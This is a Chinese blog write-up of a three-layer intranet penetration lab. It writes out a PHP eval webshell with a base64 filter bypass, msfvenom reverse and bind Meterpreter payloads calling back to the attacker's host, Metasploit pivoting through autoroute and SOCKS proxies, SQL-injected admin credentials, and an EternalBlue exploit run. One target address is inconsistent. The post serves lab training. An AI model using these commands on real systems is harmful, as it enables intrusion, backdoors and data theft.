三层内网渗透

已于 2023-06-01 15:33:05 修改
阅读量401 收藏 3
点赞数 2
分类专栏: 内网靶场 文章标签: 网络 网络安全
于 2022-11-09 21:24:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53670970/article/details/127777749
版权

拓扑图:
在这里插入图片描述对target1进行攻击
用nmap扫描发现192.168.33.138网站开放80端口
在这里插入图片描述网站用php v5.0版本存在漏洞用thinkphp 探测发现确实存在漏洞
在这里插入图片描述用thinkphp写入一句话木马:
echo “<?php @eval($_POST['cmd']);?>” >shell.php当写入一句话木马时候发现报错,cat shell.php 查看一下发现因为过滤了post
我们用base64重新编码上传
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=” |base64-d >shell.php
在这里插入图片描述用蚁剑连接上去,现在我们已经拿到了target1这台服务器的web权限
在这里插入图片描述使用msf
生成后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.33.128 LPORT=1111 -f elf >t1.elf

接受反弹:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.128
set LPORT 1111
exploit
在这里插入图片描述用蚁剑把msf生成木马上传到网站目录,在蚁剑里面将文件设置一个可执行权限,这样文件就可以执行上线了
在这里插入图片描述可以看到msf里面已经返回会话了可以看到权限是低权限,我们先不提权继续渗透
在这里插入图片描述

信息收集及配置访问
获取网络接口:run get_local_subnets //发现由两张网卡
查看路由地址:run auto route -p
添加路由地址:run autoroute -s 192.168.22.0/24 //这样保证我们kali主机对22网段的主机有权限操作了
在这里插入图片描述开启本地代理:(创建SOCK5协议代理)(因为有时候kali上面没有好用的工具,需要用windows系统所以我们开一个代理)
use auxiliary/server/socks5
set srvport 2222
exploit
vim /etc/proxychains4.conf
打开配置为文件将这里改成刚才设置的地址和端口
在这里插入图片描述对target2进行攻击
然后开代理去扫描(为了节省时间就不扫c段了原则上应该扫描c段去探测)
在这里插入图片描述在windows上挂代理
在这里插入图片描述走代理访问192.168.22.128
在这里插入图片描述通过这个cms的sql注入漏洞拿到账号密码
账号:admin
密码:123qwe
通过查找robots.txt拿到后台登录地址
在这里插入图片描述登录到后台我们最关注的点就是模板,发现有修改模板功能
在这里插入图片描述随便找一个php文件写入后门代码
在这里插入图片描述默认index.php指向这里
在这里插入图片描述走代理用菜刀连接webshell
在这里插入图片描述这样我们现在获取到了target2的webshell权限
在这里插入图片描述然后上传一个正向的webshell因为刚才target2上没有192.168.22网段的网卡所以不能上传反向的木马,如果生成之前payload绑定的46木马,木马反向连接不上,所以用正向木马因为kali已经添加了22网段的路由
生成正向后门:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
上传到菜刀
在这里插入图片描述访问接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
在这里插入图片描述信息收集及配置访问
获取网络接口:run get_local_subnets //可以看到有两张网卡
在这里插入图片描述查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.44.0/24
在这里插入图片描述对target3进行攻击
用nmap扫描这张网卡 nmap 192.168.44.0/24
发现: 192.168.44.33
使用ms17_010探测模块 use auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述set payload windows/meterpreter/bind_tcp //正向连接(因为不设置正向连接,他本来反向连接paload会连接kali的网卡这样连接不上)

use exploit/windows/smb/ms17_010_eternalblue//利用漏洞
set RHOSTS 192.168.33.33 //攻击目标
exploit
shell
dir /S flag.txt /B
type C:\Users\Administrator\Desktop\flag.txt
这样我们就拿到了target3的操作系统权限成功上线target3
在这里插入图片描述

酷酷的泽
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一个实验了解多层内网渗透
Jeeseen123的博客
11-03 1597
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。 一、实验简介 网络拓扑图 渗透机:win10+kali 第一层靶机 (外网web服务器): Linux 第二场靶机 (内网web服务器): Linux 第三层靶机 (内网办公机) : win7 用三层
Web渗透笔记.pdf
08-04
权限提升是 Web 渗透测试的第三步,目的是升级权限,以便更好地控制目标网站。常见的权限提升方法包括利用漏洞提升权限、利用配置文件提升权限等。 权限维持 权限维持是 Web 渗透测试的第四步,目的是维持已获取的...
MSF三层网络渗透
不曾扬帆,何以至远方
06-29 723
内网穿透‘、msf多层网络渗透、msf配合Proxifier实现内网穿透
三层内网渗透笔记-靶场(teamssix.com)
mingyqf的博客
02-02 736
渗透流程参考:https://mp.weixin.qq.com/s/oa_7YBrvtCRIYlBbwcqoVQ,部分截图引用该公众号。
内网渗透学习(三层网络拓扑)红日靶场
叶子的Blog
05-05 3329
环境搭建 配置虚拟机网卡 在Vmware中新增两个虚拟网卡VMnet8、VMnet14。VMnet8设为默认的NAT模式,IP段设为192.168.52.0/24;VMnet14设为仅主机模式,IP段设为192.168.93.0/24 环境信息 DMZ区的 Ubuntu 需要启动redis和nginx服务: sudo redis-server /etc/redis.conf sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo iptables -F
CTF赛三层内网渗透
weixin_59047731的博客
02-04 1352
2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在Flag,获取一个Flag对应一个积分,获取三个Flag结束。
Linux下渗透嗅探术
09-24
本文将详细探讨Linux下渗透嗅探的基本原理、常用工具和技术,以及如何安全地进行内网渗透测试。 #### 二、渗透嗅探的基础知识 渗透嗅探是指在网络环境中,通过监听和捕获网络流量来获取敏感信息或进一步探索网络...
cobaltstrike4.0
05-27
4.0版本可能增强了这些功能,提供更精确的漏洞发现和更有效的内网渗透技术。 ### 四、渗透测试实战 1. **信息收集**:Cobalt Strike可以快速搜集目标网络信息,包括开放端口、服务版本、操作系统类型等。 2. **...
电信设备-基于多可信级别的内网的监控系统.zip
09-18
2. 网络安全:通过监测网络行为,及时发现并阻止恶意攻击,降低网络渗透的风险。 3. 性能监控:通过对网络资源的监控,可以优化网络性能,提高服务质量,避免因系统故障导致的服务中断。 4. 法规合规:满足行业...
5G+第三代物联网智慧医院PPT.ppt
最新发布
02-27
由于智能化医院功能复杂、科技含量高,它的建筑涉及到建筑学、护理学、卫生学、生物学工程学等科学领域,加之医学发展快,与各种现代的高新技术相互渗透和结合,都影响医院的功能布局的设计。 1.2.1 建筑特点分析 现...
CFS 三层内网环境搭建及渗透
m0_62207170的博客
03-14 1101
cfs三层内网搭建及其复现
利用MSF实现三层网络的一次内网渗透
weixin_34357962的博客
06-19 524
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为 image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: ...
简单模拟三层内网渗透
Globalizationa的博客
02-05 756
0X01 设置三张独立网卡简单的网路拓扑图0X02 按照上面的网络拓扑图设置IP0X03 实验背景:已经拿下Ubuntu的webshell的情况下进行进入会话,查看网络环境,发现还有个网段地址 192.168.220.0/240X04 第二层网络探索利用第一层的meterpreter添加第二层的路由:然后利用msf进行第二层网络存活主机扫描:切换到扫描模块 use auxiliary/scanner/discovery/arp_sweep 进行各项配置之后,查询之后发现只有192.16...
三层网络渗透测试实验
m0_60571990的博客
11-23 224
三层网络渗透测试实验
CFS三层内网环境 渗透流程
baynk的博客
07-07 1547
0x00 环境搭建 本身作者环境已经部署完成,只需要更改IP地址及服务策略即可正常使用。原文地址公众号teamssix,回复cfs即可。 我这里将操作时将环境做了一定调整,将Target 1的Vmnet1网卡改成了VMnet8,其余的保持不变,另外还需要在Target 1的宝塔面板中加入对应的IP地址 另外如果靶机开机时没有IP地址,也需要自己手动将IP地址配置完成,确保攻击环境和Targert 1能通信,Target 2可以和Target 1与Target 3可以相互通信。 0x01 Target
一次在工作组的内网里渗透到第三层内网【从 0 到 1 打穿所有内网机器】
渗透测试研究中心
02-24 335
前言一次攻防演练中首先是团队拿到了一个 Webshell ,后续又把权限弹到了 CobaltStrike 方便我来做内网渗透:通过发现当前机器是一台公网服务器,只有公网 IP:xxx.xxx.xxx.16通过查看 arp 缓存发现当前是有一些公网机器的:通过查询这些 IP 发现是"某网络",而且通过 Nbtscan 发现当前 C 段有主机存活:(初步判断当前 C 段机器有可能存在域,但不确定)对...
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
热门推荐
不知名白帽的博客
09-18 1万+
内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)
多层内网渗透
一个普普通通的博客
04-19 399
三层内网渗透
渗透测试笔记】之【内网渗透——应用层隧道(EarthWorm的使用:各种复杂内网(一二三级网络)环境中的socks代理方法))】
AA8j的博客
10-27 686
下载地址 https://github.com/AA8j/SecTools/tree/main/ew 1. 普通网络 在普通网络环境下,可直接通过跳板机访问内网特定资源。 1.1 跳板机存在公网IP 1.1.1 网络环境 目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机) 1.1.2 使用方法 目标主机(公网IP:1.1.1.1,可访问特定内网资源): ew -s ssocksd -l 8888 侦听本机的8888端口,提供socks代理 1.1.3 流量走向 本地主机--->1.
双层内网渗透虚拟仿真实战
09-01
双层内网渗透虚拟仿真实战是一种模拟实际网络环境进行渗透测试和攻防对抗的训练方法。它模拟了一个双层内网结构,包括外网和内网两个网络环境,以便在安全授权的情况下进行演练和学习。 在这种实战中,通常会使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值